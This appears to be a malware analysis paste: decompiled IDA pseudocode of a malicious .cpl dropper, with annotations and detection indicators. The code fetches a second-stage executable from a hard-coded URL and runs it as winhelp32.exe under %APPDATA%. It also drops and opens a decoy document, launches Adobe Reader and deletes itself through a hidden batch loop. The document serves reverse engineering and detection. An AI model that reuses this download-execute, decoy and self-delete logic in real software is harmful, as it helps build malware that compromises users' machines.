hcp.cpl decompiled

a guest Sep 17th, 2010 481 Never
  1. //----- (100010B0) --------------------------------------------------------
     // MakeAndShowEgg — IDA pseudocode (decompiler-chosen names and casts).
     //
     // What the visible code does, in order:
     //   1. opens this module's own file on disk (HMODULE 0x10000000 is the image
     //      base of every function in this listing) and reads from fixed offsets:
     //        offset 1024 : 64 bytes  -> Buffer  (used as an output file name)
     //        offset 1088 : 4 bytes   -> nNumberOfBytesToWrite (payload length)
     //        offset 24576: <length>  -> heap block, copied into the new file
     //   2. creates/overwrites the file named in Buffer and writes that payload;
     //   3. ShellExecuteA("open", Buffer) — the handler is picked by extension;
     //   4. if HKLM\...\App Paths\AcroRd32.exe exists, formats a string from its
     //      value and starts it with CreateProcessA.
     // No return value of CreateFileA / ReadFile / WriteFile is checked, so a
     // failed or short read still ends in a WriteFile and a ShellExecute of
     // whatever Buffer holds. The function's "return value" is the decompiler's
     // rendering of an inlined MFC module-state restore (see the last lines),
     // not a status code.
     //
     // Observable behaviour for detection: a .cpl/DLL that opens its own image,
     // writes a new file, ShellExecutes it and immediately spawns AcroRd32.exe.
  2. int __cdecl MakeAndShowEgg()
  3. {
  4.   _UNKNOWN *v0; // eax@1
  5.   HANDLE v1; // esi@1  (read handle on this module's file)
  6.   HANDLE v2; // ebp@1  (write handle on the dropped file)
  7.   void *v3; // edi@1   (heap copy of the embedded payload)
  8.   int result; // eax@5
  9.   DWORD nNumberOfBytesToWrite; // [sp+10h] [bp-2C4h]@1  payload length read from offset 1088
  10.   LPCSTR lpApplicationName; // [sp+14h] [bp-2C0h]@3   CString, passed straight to CreateProcessA
  11.   HKEY hKey; // [sp+18h] [bp-2BCh]@1
  12.   DWORD NumberOfBytesRead; // [sp+1Ch] [bp-2B8h]@1
  13.   DWORD cbData; // [sp+20h] [bp-2B4h]@2
  14.   char v10; // [sp+24h] [bp-2B0h]@1  unused CString (constructed and destroyed only)
  15.   int v11; // [sp+28h] [bp-2ACh]@1
  16.   int v12; // [sp+2Ch] [bp-2A8h]@5
  17.   DWORD NumberOfBytesWritten; // [sp+30h] [bp-2A4h]@1
  18.   DWORD Type; // [sp+34h] [bp-2A0h]@2
  19.   struct _STARTUPINFOA StartupInfo; // [sp+38h] [bp-29Ch]@3
  20.   struct _PROCESS_INFORMATION ProcessInformation; // [sp+7Ch] [bp-258h]@3
  21.   char Buffer; // [sp+8Ch] [bp-248h]@1   64-byte name of the file to drop (stack distance to FileName is 0x40)
  22.   CHAR FileName; // [sp+CCh] [bp-208h]@1  this module's own path (0x104 bytes)
  23.   BYTE Data; // [sp+1D0h] [bp-104h]@2     App Paths value (260 bytes)
  24.  
       // MFC module-state guard; sub_10001A0D is not in this listing.
  25.   v0 = sub_10001A0D();
  26.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v11, v0);
       // 0x104 = MAX_PATH. Path of the module whose image base is 0x10000000 (this one).
  27.   GetModuleFileNameA((HMODULE)0x10000000, &FileName, 0x104u);
       // 0x80000000 = GENERIC_READ, 3 = OPEN_EXISTING. Never compared with INVALID_HANDLE_VALUE.
  28.   v1 = CreateFileA(&FileName, -2147483648u, 0, 0, 3u, 0, 0);
       // Offset 1024: 64-byte output file name embedded in the module image.
  29.   SetFilePointer(v1, 1024, 0, 0);
  30.   ReadFile(v1, &Buffer, 64u, &NumberOfBytesRead, 0);
       // Offset 1088: 4-byte payload length. Used unchecked as an allocation
       // and I/O size below, i.e. it is trusted straight from the module file.
  31.   SetFilePointer(v1, 1088, 0, 0);
  32.   ReadFile(v1, &nNumberOfBytesToWrite, 4u, &NumberOfBytesRead, 0);
       // 0x40000000 = GENERIC_WRITE, 2 = CREATE_ALWAYS: creates/overwrites the
       // file named in Buffer (relative to the current directory; see StartUp).
  33.   v2 = CreateFileA(&Buffer, 0x40000000u, 0, 0, 2u, 0, 0);
       // Offset 24576: the embedded payload, copied through a heap block.
  34.   SetFilePointer(v1, 24576, 0, 0);
  35.   v3 = operator new(nNumberOfBytesToWrite);
  36.   ReadFile(v1, v3, nNumberOfBytesToWrite, &NumberOfBytesRead, 0);
       // Writes nNumberOfBytesToWrite bytes regardless of how many were read.
  37.   WriteFile(v2, v3, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
  38.   CloseHandle(v2);
  39.   operator delete(v3);
  40.   CloseHandle(v1);
       // 1 = SW_SHOWNORMAL. Opens the dropped file with its registered handler.
  41.   ShellExecuteA(0, "open", &Buffer, 0, 0, 1);
  42.   CString__CString(&v10);
       // 0x20019 = KEY_READ. Looks up Adobe Reader's registered executable path;
       // the App Paths key only exists when Reader is installed.
  43.   if ( !RegOpenKeyExA(
  44.           HKEY_LOCAL_MACHINE,
  45.           "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\AcroRd32.exe",
  46.           0,
  47.           0x20019u,
  48.           &hKey) )
  49.   {
         // cbData = 260 = MAX_PATH. ValueName is a global not shown in this listing
         // (the default value of the key is the usual App Paths convention — confirm).
  50.     cbData = 260;
  51.     if ( !RegQueryValueExA(hKey, ValueName, 0, &Type, &Data, &cbData) )
  52.     {
  53.       CString__CString(&lpApplicationName);
           // unk_10003020 is a format string in the data section, not visible here;
           // presumably it builds a path/command line around the Reader path in Data.
  54.       CString__Format(&lpApplicationName, (const char *)&unk_10003020, &Data);
  55.       memset(&StartupInfo, 0, sizeof(StartupInfo));
           // 68 = sizeof(STARTUPINFOA); 1 = STARTF_USESHOWWINDOW; 5 = SW_SHOW.
  56.       StartupInfo.cb = 68;
  57.       StartupInfo.dwFlags = 1;
  58.       StartupInfo.wShowWindow = 5;
           // Starts Reader. Return value ignored; the hProcess/hThread handles in
           // ProcessInformation are never closed.
  59.       CreateProcessA(lpApplicationName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
  60.       CString___CString(&lpApplicationName);
  61.     }
  62.     RegCloseKey(hKey);
  63.   }
  64.   CString___CString(&v10);
       // Appears to be the inlined AFX_MAINTAIN_STATE2 destructor (restores the
       // previous MFC module state); v12 is its object pointer, so "result" is
       // not a meaningful value for callers.
  65.   result = v12;
  66.   *(_DWORD *)(v12 + 4) = v11;
  67.   return result;
  68. }
  69.  
  70. //----- (100012E0) --------------------------------------------------------
      // IsAdmin — IDA pseudocode.
      //
      // Returns 1 when the caller's token (thread impersonation token first,
      // process token as a fallback) lists BUILTIN\Administrators among its
      // groups, 0 on any failure. The SID compared against is built from
      // SECURITY_NT_AUTHORITY (5) with RIDs 0x20 and 0x220, i.e. S-1-5-32-544.
      //
      // Review notes (grounded in the visible code):
      //   - only SID equality is tested; the Attributes word of each
      //     SID_AND_ATTRIBUTES entry is never read, so a group that is present
      //     but disabled or deny-only (e.g. a UAC-filtered token) still counts;
      //   - TokenHandle is never closed on any path;
      //   - none of the other three functions in this listing call it.
  71. char __cdecl IsAdmin()
  72. {
  73.   _UNKNOWN *v0; // eax@1
  74.   HANDLE v1; // eax@1
  75.   HANDLE v2; // eax@3
  76.   char result; // al@4
  77.   int v4; // eax@9
  78.   void *v5; // esp@9
  79.   unsigned int v6; // edi@15  index into TOKEN_GROUPS.Groups[]
  80.   PSID *v7; // ebx@16        cursor over Groups[] (steps by 2 pointers = one SID_AND_ATTRIBUTES)
  81.   char v8; // [sp+0h] [bp-2Ch]@9   start of the stack TOKEN_GROUPS buffer (GroupCount)
  82.   char v9; // [sp+4h] [bp-28h]@16  Groups[0]
  83.   int v10; // [sp+Ch] [bp-20h]@1
  84.   int v11; // [sp+10h] [bp-1Ch]@4
  85.   struct _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority; // [sp+14h] [bp-18h]@1
  86.   PSID pSid; // [sp+1Ch] [bp-10h]@13
  87.   DWORD ReturnLength; // [sp+20h] [bp-Ch]@5
  88.   HANDLE TokenHandle; // [sp+24h] [bp-8h]@1
  89.   char v16; // [sp+2Bh] [bp-1h]@15   result flag: 1 once a matching SID is found
  90.  
       // MFC module-state guard; the `*(_DWORD *)(v11 + 4) = v10` stores that
       // precede every return appear to be its inlined destructor.
  91.   v0 = sub_10001A0D();
  92.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v10, v0);
       // SECURITY_NT_AUTHORITY = {0,0,0,0,0,5}.
  93.   pIdentifierAuthority.Value[0] = 0;
  94.   pIdentifierAuthority.Value[1] = 0;
  95.   pIdentifierAuthority.Value[2] = 0;
  96.   pIdentifierAuthority.Value[3] = 0;
  97.   pIdentifierAuthority.Value[4] = 0;
  98.   pIdentifierAuthority.Value[5] = 5;
  99.   v1 = GetCurrentThread();
       // 8 = TOKEN_QUERY. Try the thread's impersonation token first.
  100.   if ( !OpenThreadToken(v1, 8u, 0, &TokenHandle) )
  101.   {
          // 1008 = ERROR_NO_TOKEN: the thread is not impersonating, use the process token.
  102.     if ( GetLastError() != 1008 )
  103.     {
  104. LABEL_12:
  105.       result = 0;
  106.       *(_DWORD *)(v11 + 4) = v10;
  107.       return result;
  108.     }
  109.     v2 = GetCurrentProcess();
  110.     if ( !OpenProcessToken(v2, 8u, &TokenHandle) )
  111.     {
  112.       *(_DWORD *)(v11 + 4) = v10;
  113.       return 0;
  114.     }
  115.   }
       // Size query with a NULL buffer: success here is unexpected and treated as failure.
  116.   if ( GetTokenInformation(TokenHandle, TokenGroups, 0, 0, &ReturnLength) )
  117.   {
  118.     *(_DWORD *)(v11 + 4) = v10;
  119.     return 0;
  120.   }
       // 122 = ERROR_INSUFFICIENT_BUFFER is the expected outcome of the size query.
  121.   if ( GetLastError() != 122 )
  122.   {
  123.     result = 0;
  124.     *(_DWORD *)(v11 + 4) = v10;
  125.     return result;
  126.   }
       // Round the required size up to a multiple of 4 and take it from the stack
       // (_alloca). The `!&v8` test below is how the decompiler rendered the
       // stack-probe/alloca failure check; a stack address is never NULL.
  127.   v4 = ReturnLength + 3;
  128.   LOBYTE(v4) = (ReturnLength + 3) & 0xFC;
  129.   v5 = alloca(v4);
  130.   if ( !&v8 )
  131.   {
  132.     *(_DWORD *)(v11 + 4) = v10;
  133.     return 0;
  134.   }
  135.   if ( !GetTokenInformation(TokenHandle, TokenGroups, &v8, ReturnLength, &ReturnLength) )
  136.     goto LABEL_12;
       // BUILTIN\Administrators: 2 sub-authorities, 0x20 = SECURITY_BUILTIN_DOMAIN_RID,
       // 0x220 = DOMAIN_ALIAS_RID_ADMINS.
  137.   if ( AllocateAndInitializeSid(&pIdentifierAuthority, 2u, 0x20u, 0x220u, 0, 0, 0, 0, 0, 0, &pSid) )
  138.   {
  139.     v6 = 0;
  140.     v16 = 0;
         // *(_DWORD *)&v8 is TOKEN_GROUPS.GroupCount.
  141.     if ( *(_DWORD *)&v8 )
  142.     {
           // v7 walks Groups[i].Sid; `v7 += 2` skips the Sid pointer plus the
           // Attributes DWORD. Attributes are never examined.
  143.       v7 = (PSID *)&v9;
  144.       while ( !EqualSid(*v7, pSid) )
  145.       {
  146.         ++v6;
  147.         v7 += 2;
  148.         if ( v6 >= *(_DWORD *)&v8 )
  149.           goto LABEL_21;
  150.       }
  151.       v16 = 1;
  152.     }
  153. LABEL_21:
         // pSid is freed; TokenHandle is not.
  154.     FreeSid(pSid);
  155.     result = v16;
  156.     *(_DWORD *)(v11 + 4) = v10;
  157.   }
  158.   else
  159.   {
  160.     *(_DWORD *)(v11 + 4) = v10;
  161.     result = 0;
  162.   }
  163.   return result;
  164. }
  165.  
  166. //----- (10001490) --------------------------------------------------------
       // DeleteMyself — IDA pseudocode.
       //
       // Self-removal routine. It writes a batch file "DMS.bat" into the
       // directory of this module (image base 0x10000000), whose content is the
       // wsprintfA format string below: loop deleting the module file until it
       // is gone, then delete the batch file itself. The batch is started
       // suspended at idle priority while this thread/process raises its own
       // priority, is resumed, and PostQuitMessage(0) is posted so the hosting
       // message loop can exit (releasing the module file so the DEL succeeds —
       // presumably; the host is not in this listing).
       //
       // Observable behaviour for detection: creation of a .bat next to a
       // .cpl/DLL containing a `:Repeat` / `DEL` / `goto Repeat` loop naming
       // that module, followed by a hidden cmd process. The two do/while loops
       // are inlined strlen (rep scasb) and the memcpy is an inlined strcat;
       // neither checks the 0x104-byte FileName buffer.
  167. int __cdecl DeleteMyself()
  168. {
  169.   signed int v0; // ecx@1   countdown for inlined strlen("\\DMS.bat")
  170.   int v1; // edi@1          cursor over "\\DMS.bat"
  171.   _UNKNOWN *v2; // eax@1
  172.   char v3; // zf@3
  173.   signed int v4; // ecx@5   countdown for inlined strlen(FileName)
  174.   signed int v5; // ecx@5   strlen("\\DMS.bat") + 1
  175.   unsigned int v6; // ebx@5 bytes to append (includes the NUL)
  176.   CHAR *v7; // edi@5        cursor over FileName
  177.   const void *v8; // esi@5  start of "\\DMS.bat"
  178.   char v9; // zf@7
  179.   HANDLE v10; // esi@9      handle of the batch file
  180.   int v11; // eax@10
  181.   HANDLE v12; // eax@11
  182.   HANDLE v13; // eax@11
  183.   int result; // eax@12
  184.   int v15; // [sp+Ch] [bp-650h]@1
  185.   int v16; // [sp+10h] [bp-64Ch]@12
  186.   struct _PROCESS_INFORMATION ProcessInformation; // [sp+14h] [bp-648h]@10
  187.   DWORD NumberOfBytesWritten; // [sp+24h] [bp-638h]@10
  188.   struct _STARTUPINFOA StartupInfo; // [sp+28h] [bp-634h]@10
  189.   CHAR FileName; // [sp+6Ch] [bp-5F0h]@1    module directory + "\\DMS.bat" (0x104 bytes)
  190.   CHAR String2; // [sp+170h] [bp-4ECh]@1    full path of this module (0x104 bytes)
  191.   CHAR String; // [sp+274h] [bp-3E8h]@10    batch file text
  192.  
        // MFC module-state guard; see the matching store before `return`.
  193.   v2 = sub_10001A0D();
  194.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v15, v2);
        // 0x104 = MAX_PATH. String2 = this module's own path.
  195.   GetModuleFileNameA((HMODULE)0x10000000, &String2, 0x104u);
  196.   lstrcpyA(&FileName, &String2);
        // 92 = '\\'. Truncates FileName to its directory. strrchr's result is not
        // checked, so a path without a backslash would write through NULL.
  197.   *strrchr(&FileName, 92) = 0;
        // Inlined strlen("\\DMS.bat"): v0 counts down from -1 until the NUL.
  198.   v1 = (int)"\\DMS.bat";
  199.   v0 = -1;
  200.   do
  201.   {
  202.     if ( !v0 )
  203.       break;
  204.     v3 = *(_BYTE *)v1++ == 0;
  205.     --v0;
  206.   }
  207.   while ( !v3 );
        // v5 = ~v0 = length including the terminator; v8 = start of the literal.
  208.   v5 = ~v0;
  209.   v8 = (const void *)(v1 - v5);
  210.   v6 = v5;
        // Inlined strlen(FileName): v7 ends one past FileName's NUL.
  211.   v7 = &FileName;
  212.   v4 = -1;
  213.   do
  214.   {
  215.     if ( !v4 )
  216.       break;
  217.     v9 = *v7++ == 0;
  218.     --v4;
  219.   }
  220.   while ( !v9 );
        // Inlined strcat: overwrite the NUL with "\\DMS.bat\0". No bound against
        // the 0x104-byte buffer.
  221.   memcpy(v7 - 1, v8, v6);
        // 0x40000000 = GENERIC_WRITE, 2 = CREATE_ALWAYS,
        // 0x8000080 = FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN.
  222.   v10 = CreateFileA(&FileName, 0x40000000u, 0, 0, 2u, 0x8000080u, 0);
  223.   if ( v10 != (HANDLE)-1 )
  224.   {
          // Batch body: delete the module (String2) until it no longer exists,
          // then delete the batch file (FileName) itself.
  225.     wsprintfA(
  226.       &String,
  227.       ":Repeat\r\nDEL \"%s\"\r\nif exist \"%s\" goto Repeat\r\nDEL \"%s\"\r\n",
  228.       &String2,
  229.       &String2,
  230.       &FileName);
  231.     v11 = lstrlenA(&String);
  232.     WriteFile(v10, &String, v11, &NumberOfBytesWritten, 0);
  233.     CloseHandle(v10);
  234.     memset(&StartupInfo, 0, sizeof(StartupInfo));
          // 0 = SW_HIDE (the batch runs without a visible window); 68 = sizeof(STARTUPINFOA);
          // 1 = STARTF_USESHOWWINDOW.
  235.     StartupInfo.wShowWindow = 0;
  236.     StartupInfo.cb = 68;
  237.     StartupInfo.dwFlags = 1;
          // 0x44 = CREATE_SUSPENDED | IDLE_PRIORITY_CLASS; the batch is run via
          // its command line (lpApplicationName = 0). The wide literal L"\\" as
          // lpCurrentDirectory of an ANSI API is most likely a decompiler
          // rendering; as bytes it reads as "\" — confirm in the disassembly.
  238.     if ( CreateProcessA(0, &FileName, 0, 0, 0, 0x44u, 0, L"\\", &StartupInfo, &ProcessInformation) )
  239.     {
            // -15 = THREAD_PRIORITY_IDLE for the batch; 15 = THREAD_PRIORITY_TIME_CRITICAL
            // and 0x80 = HIGH_PRIORITY_CLASS for this thread/process, so this code
            // (and the PostQuitMessage below) presumably runs before the batch
            // starts deleting.
  240.       SetThreadPriority(ProcessInformation.hThread, -15);
  241.       v12 = GetCurrentThread();
  242.       SetThreadPriority(v12, 15);
  243.       v13 = GetCurrentProcess();
  244.       SetPriorityClass(v13, 0x80u);
  245.       CloseHandle(ProcessInformation.hProcess);
  246.       ResumeThread(ProcessInformation.hThread);
  247.       CloseHandle(ProcessInformation.hThread);
  248.     }
  249.   }
        // Result discarded; likely a leftover from debugging.
  250.   GetLastError();
        // Asks the hosting message loop to exit.
  251.   PostQuitMessage(0);
        // Inlined module-state restore (see IsAdmin/MakeAndShowEgg); not a status code.
  252.   result = v16;
  253.   *(_DWORD *)(v16 + 4) = v15;
  254.   return result;
  255. }
  256.  
  257. //----- (100017A0) --------------------------------------------------------
       // StartUp — IDA pseudocode. The top-level sequence visible in this listing:
       //   1. set the current directory to CSIDL_APPDATA (26), so the files
       //      created by DownloadFile and MakeAndShowEgg land under %APPDATA%;
       //   2. download "winhelp32.exe" from the hard-coded URL and, on success,
       //      run it (WinExec, 5 = SW_SHOW). DownloadFile is not in this listing;
       //   3. drop and open the embedded decoy (MakeAndShowEgg);
       //   4. remove this module via a batch file (DeleteMyself).
       // Always returns 1. Whoever calls StartUp (for a .cpl, presumably the
       // CPlApplet export) is not shown here. IsAdmin is not consulted.
       //
       // Indicators on this page: the download URL below, the file name
       // "winhelp32.exe" written under %APPDATA%, and "DMS.bat" next to the module.
  258. char __cdecl StartUp()
  259. {
  260.   _UNKNOWN *v0; // eax@1
  261.   int v2; // [sp+0h] [bp-10Ch]@1
  262.   int v3; // [sp+4h] [bp-108h]@3
  263.   CHAR PathName; // [sp+8h] [bp-104h]@1   %APPDATA% path (0x104 bytes)
  264.  
        // MFC module-state guard; restored by the store before `return`.
  265.   v0 = sub_10001A0D();
  266.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v2, v0);
        // 26 = CSIDL_APPDATA. Return values of both calls are ignored, so on
        // failure the subsequent relative paths resolve against whatever the
        // host's current directory is.
  267.   SHGetSpecialFolderPathA(0, &PathName, 26, 0);
  268.   SetCurrentDirectoryA(&PathName);
        // Second-stage fetch; the file is written relative to the directory set above.
  269.   if ( (unsigned __int8)DownloadFile("winhelp32.exe", (int)"http://academyhouse.us/from/wincrng.exe") )
  270.     WinExec("winhelp32.exe", 5u);
  271.   MakeAndShowEgg();
  272.   DeleteMyself();
        // Inlined module-state restore.
  273.   *(_DWORD *)(v3 + 4) = v2;
  274.   return 1;
  275. }